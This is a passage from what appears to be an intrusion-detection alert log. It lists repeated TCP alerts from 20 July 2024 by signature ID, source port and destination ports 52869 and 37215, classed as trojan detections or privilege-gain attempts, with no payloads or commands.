                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.298540
                      SID:2027339
                      Source Port:58416
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.875100
                      SID:2025132
                      Source Port:40704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.032369
                      SID:2027339
                      Source Port:56572
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.878540
                      SID:2831300
                      Source Port:42798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.569820
                      SID:2027339
                      Source Port:59610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.459445
                      SID:2027339
                      Source Port:56400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.509003
                      SID:2027339
                      Source Port:43184
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221557
                      SID:2829579
                      Source Port:43680
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.989167
                      SID:2829579
                      Source Port:40944
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.291616
                      SID:2829579
                      Source Port:49758
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.653653
                      SID:2025132
                      Source Port:40142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.092258
                      SID:2831300
                      Source Port:55428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:57.297792
                      SID:2027339
                      Source Port:36240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.500991
                      SID:2027339
                      Source Port:49978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.144955
                      SID:2027339
                      Source Port:57898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.000956
                      SID:2027339
                      Source Port:39884
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:06.083203
                      SID:2025132
                      Source Port:51036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.280419
                      SID:2027339
                      Source Port:40114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.639093
                      SID:2829579
                      Source Port:57218
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.374539
                      SID:2025132
                      Source Port:54890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.603339
                      SID:2027339
                      Source Port:56536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.320679
                      SID:2027339
                      Source Port:50886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.678633
                      SID:2027339
                      Source Port:37760
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.953491
                      SID:2831300
                      Source Port:35740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:58.885082
                      SID:2831300
                      Source Port:42284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:50.212921
                      SID:2025132
                      Source Port:43722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.947663
                      SID:2831300
                      Source Port:45862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.649139
                      SID:2027339
                      Source Port:54854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.608320
                      SID:2831300
                      Source Port:53230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.745651
                      SID:2027339
                      Source Port:36060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.288562
                      SID:2025132
                      Source Port:38702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:03.482119
                      SID:2025132
                      Source Port:35784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:43.182629
                      SID:2025132
                      Source Port:45054
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:57.269160
                      SID:2027339
                      Source Port:53070
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.572196
                      SID:2831300
                      Source Port:50430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.164529
                      SID:2027339
                      Source Port:60322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.182584
                      SID:2027339
                      Source Port:52454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.197088
                      SID:2831300
                      Source Port:41930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.308763
                      SID:2831300
                      Source Port:53860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.636599
                      SID:2835222
                      Source Port:56778
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.082385
                      SID:2829579
                      Source Port:48818
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.285038
                      SID:2835222
                      Source Port:46210
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.294002
                      SID:2025132
                      Source Port:37170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.979565
                      SID:2829579
                      Source Port:45832
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.460493
                      SID:2027339
                      Source Port:41624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.639230
                      SID:2829579
                      Source Port:45886
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.323644
                      SID:2027339
                      Source Port:53882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.749294
                      SID:2027339
                      Source Port:56020
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.751333
                      SID:2025132
                      Source Port:49320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.313382
                      SID:2831300
                      Source Port:39784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.921789
                      SID:2027339
                      Source Port:53216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.985241
                      SID:2025132
                      Source Port:44076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.749737
                      SID:2829579
                      Source Port:34842
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.619598
                      SID:2027339
                      Source Port:36368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.976795
                      SID:2835222
                      Source Port:46866
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.594120
                      SID:2831300
                      Source Port:39454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:40.334934
                      SID:2835222
                      Source Port:44412
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.988055
                      SID:2829579
                      Source Port:46780
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.769238
                      SID:2831300
                      Source Port:37584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.810783
                      SID:2027339
                      Source Port:49636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.633481
                      SID:2835222
                      Source Port:53114
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.296002
                      SID:2027339
                      Source Port:41596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.152427
                      SID:2835222
                      Source Port:54164
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.158533
                      SID:2025132
                      Source Port:54662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.144672
                      SID:2829579
                      Source Port:55502
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.630327
                      SID:2831300
                      Source Port:55212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:25.468217
                      SID:2025132
                      Source Port:54598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:59.234149
                      SID:2025132
                      Source Port:44354
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:14.097795
                      SID:2835222
                      Source Port:40992
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.371551
                      SID:2025132
                      Source Port:43256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.527952
                      SID:2027339
                      Source Port:46940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.452119
                      SID:2831300
                      Source Port:41008
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.660516
                      SID:2027339
                      Source Port:34708
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.368405
                      SID:2025132
                      Source Port:51762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.990801
                      SID:2025132
                      Source Port:40110
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.311969
                      SID:2027339
                      Source Port:46830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.650744
                      SID:2025132
                      Source Port:53702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.004907
                      SID:2829579
                      Source Port:46144
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.276434
                      SID:2025132
                      Source Port:46648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.347676
                      SID:2027339
                      Source Port:52512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.070492
                      SID:2835222
                      Source Port:47304
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.626717
                      SID:2831300
                      Source Port:34632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.261796
                      SID:2025132
                      Source Port:49158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.115230
                      SID:2027339
                      Source Port:60698
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.270636
                      SID:2831300
                      Source Port:41154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.253863
                      SID:2027339
                      Source Port:49652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.861753
                      SID:2831300
                      Source Port:43498
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.119426
                      SID:2027339
                      Source Port:52300
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.940207
                      SID:2027339
                      Source Port:41092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.202570
                      SID:2027339
                      Source Port:53546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.925038
                      SID:2025132
                      Source Port:36862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:11.592030
                      SID:2027339
                      Source Port:56472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.773260
                      SID:2027339
                      Source Port:38564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.713195
                      SID:2831300
                      Source Port:55648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.662969
                      SID:2829579
                      Source Port:51076
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.876750
                      SID:2835222
                      Source Port:40666
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.636534
                      SID:2829579
                      Source Port:60674
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.310738
                      SID:2027339
                      Source Port:51218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.668802
                      SID:2831300
                      Source Port:60212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:32.034562
                      SID:2829579
                      Source Port:34840
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.926055
                      SID:2831300
                      Source Port:36816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.049279
                      SID:2829579
                      Source Port:45534
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.460651
                      SID:2831300
                      Source Port:39324
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.574948
                      SID:2831300
                      Source Port:46830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.151857
                      SID:2027339
                      Source Port:54136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.639093
                      SID:2835222
                      Source Port:44420
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.231165
                      SID:2027339
                      Source Port:38630
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.035612
                      SID:2025132
                      Source Port:59540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.677933
                      SID:2831300
                      Source Port:49330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.161614
                      SID:2835222
                      Source Port:38518
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.207040
                      SID:2829579
                      Source Port:38408
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.157619
                      SID:2829579
                      Source Port:59652
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.868779
                      SID:2831300
                      Source Port:43666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:03:53.978924
                      SID:2027339
                      Source Port:37004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.032492
                      SID:2829579
                      Source Port:51940
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.762943
                      SID:2027339
                      Source Port:45962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.555540
                      SID:2831300
                      Source Port:52378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.934977
                      SID:2835222
                      Source Port:45554
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.197215
                      SID:2027339
                      Source Port:52494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.082045
                      SID:2829579
                      Source Port:55584
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.921076
                      SID:2025132
                      Source Port:44200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.486106
                      SID:2027339
                      Source Port:56122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.663212
                      SID:2027339
                      Source Port:48812
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.261796
                      SID:2027339
                      Source Port:47412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650643
                      SID:2829579
                      Source Port:55442
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.054387
                      SID:2829579
                      Source Port:43712
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.563416
                      SID:2831300
                      Source Port:38528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.311969
                      SID:2831300
                      Source Port:33776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.423677
                      SID:2027339
                      Source Port:35350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.384516
                      SID:2025132
                      Source Port:54890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.296076
                      SID:2835222
                      Source Port:58716
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.664887
                      SID:2829579
                      Source Port:47230
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.034562
                      SID:2829579
                      Source Port:60676
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.535137
                      SID:2027339
                      Source Port:56094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.627153
                      SID:2025132
                      Source Port:37094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.560530
                      SID:2831300
                      Source Port:59256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:13.314226
                      SID:2025132
                      Source Port:40464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.721182
                      SID:2025132
                      Source Port:60912
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:04.052371
                      SID:2027339
                      Source Port:40874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.596563
                      SID:2831300
                      Source Port:52728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.704266
                      SID:2027339
                      Source Port:49340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.020551
                      SID:2027339
                      Source Port:45532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.903844
                      SID:2027339
                      Source Port:40620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.996056
                      SID:2835222
                      Source Port:59354
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.845332
                      SID:2027339
                      Source Port:50558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.739158
                      SID:2835222
                      Source Port:52978
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.908066
                      SID:2027339
                      Source Port:46248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.968238
                      SID:2831300
                      Source Port:50916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.612377
                      SID:2831300
                      Source Port:38532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.677519
                      SID:2835222
                      Source Port:40302
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.050503
                      SID:2835222
                      Source Port:52282
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.750477
                      SID:2831300
                      Source Port:37158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:05.544188
                      SID:2025132
                      Source Port:42936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.590938
                      SID:2831300
                      Source Port:39990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.014688
                      SID:2829579
                      Source Port:58962
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.999060
                      SID:2027339
                      Source Port:46928
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.973541
                      SID:2829579
                      Source Port:33252
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.218109
                      SID:2025132
                      Source Port:35668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.113254
                      SID:2835222
                      Source Port:40340
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.987411
                      SID:2831300
                      Source Port:32886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.004063
                      SID:2831300
                      Source Port:40778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.079114
                      SID:2829579
                      Source Port:45680
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.085431
                      SID:2835222
                      Source Port:37978
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.161614
                      SID:2829579
                      Source Port:33112
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.375005
                      SID:2025132
                      Source Port:54766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.124696
                      SID:2829579
                      Source Port:42616
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:42.973189
                      SID:2025132
                      Source Port:41250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.262010
                      SID:2831300
                      Source Port:40522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.929013
                      SID:2829579
                      Source Port:36096
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.605795
                      SID:2025132
                      Source Port:35024
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:13.596807
                      SID:2027339
                      Source Port:36092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.124696
                      SID:2829579
                      Source Port:40416
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.975107
                      SID:2829579
                      Source Port:53832
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.649885
                      SID:2829579
                      Source Port:54310
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.164529
                      SID:2027339
                      Source Port:35910
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.074222
                      SID:2831300
                      Source Port:45436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:20.472956
                      SID:2027339
                      Source Port:56140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.565610
                      SID:2027339
                      Source Port:52460
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:06.738802
                      SID:2027339
                      Source Port:42618
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.073087
                      SID:2835222
                      Source Port:42264
